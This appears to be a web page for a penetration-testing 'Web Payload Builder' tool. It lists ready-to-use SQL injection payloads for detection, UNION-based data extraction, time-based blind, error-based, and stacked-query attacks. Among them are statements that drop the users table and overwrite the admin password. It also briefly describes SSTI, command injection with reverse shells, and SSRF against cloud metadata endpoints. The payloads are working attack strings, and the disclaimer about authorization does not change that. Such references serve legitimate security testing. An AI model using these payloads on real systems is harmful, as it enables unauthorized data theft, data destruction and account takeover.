Interactive Tool

Web Payload Builder

Generate attack payloads for common web vulnerabilities. Select the vulnerability type, choose your target technology, and get ready-to-use payloads.

Warning

These payloads are for authorized penetration testing only. Using them against systems without explicit permission is illegal. Always obtain proper authorization before testing.

Web Payload Builder

Generate payloads for common web vulnerabilities

Detection

Basic SQLi detection tests

' OR '1'='1
' OR '1'='1'--
' OR '1'='1'#
' OR 1=1-- -
admin'--
1' AND '1'='1
1' AND '1'='2

UNION Based

Extract data via UNION SELECT

' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT @@version,NULL,NULL--
' UNION SELECT user(),database(),NULL--
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--

Time-Based Blind

Detect via time delays

' AND SLEEP(5)--
' AND IF(1=1,SLEEP(5),0)--
' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--
' AND BENCHMARK(5000000,SHA1('test'))--
1' AND (SELECT SLEEP(5) FROM dual WHERE database() LIKE '%')--

Error Based

Extract data via error messages

' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT @@version),0x7e))--
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT user()),0x7e),1)--
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--

Stacked Queries

Multiple statements (if supported)

'; DROP TABLE users;--
'; INSERT INTO users VALUES('hacker','hacked');--
'; UPDATE users SET password='hacked' WHERE username='admin';--

⚠️ These payloads are for authorized security testing only. Always obtain proper authorization.

How to Use This Tool

💉 SQL Injection

Select your target database type to get appropriate payloads. Different databases have different syntax for comments, string concatenation, and built-in functions.

  • Detection: Start here to confirm SQLi exists
  • UNION Based: For data extraction when output is visible
  • Time-Based: For blind injection detection
  • Error Based: When errors reveal data

📝 SSTI (Server-Side Template Injection)

Template engines have different syntax. Identify the engine first using detection payloads, then use RCE payloads for code execution.

  • Jinja2: Python Flask/Django
  • Twig: PHP Symfony
  • FreeMarker: Java applications
  • ERB: Ruby on Rails

💻 Command Injection

OS commands vary between Linux/macOS (bash) and Windows (cmd/PowerShell). Use appropriate payloads for your target system.

  • Basic: Simple command chaining (; | || &&)
  • Blind: Detect via sleep or out-of-band
  • Filter Bypass: When basic chars are filtered
  • Reverse Shell: Get interactive access

🌐 SSRF (Server-Side Request Forgery)

Cloud metadata services are prime SSRF targets. Each cloud provider has different endpoints and may require specific headers.

  • AWS: IMDSv1 (easy) vs IMDSv2 (needs token)
  • GCP: Requires Metadata-Flavor header
  • Azure: Requires Metadata: true header
  • Kubernetes: Service account tokens

Related Resources

SQL Injection Guide

Deep-dive SQLi exploitation

SSTI Guide

Template injection techniques

Command Injection Guide

OS command injection

SSRF Guide

Server-side request forgery

Reverse Shell Generator

Generate reverse shell one-liners

SQLMap Cheatsheet

Automated SQLi with SQLMap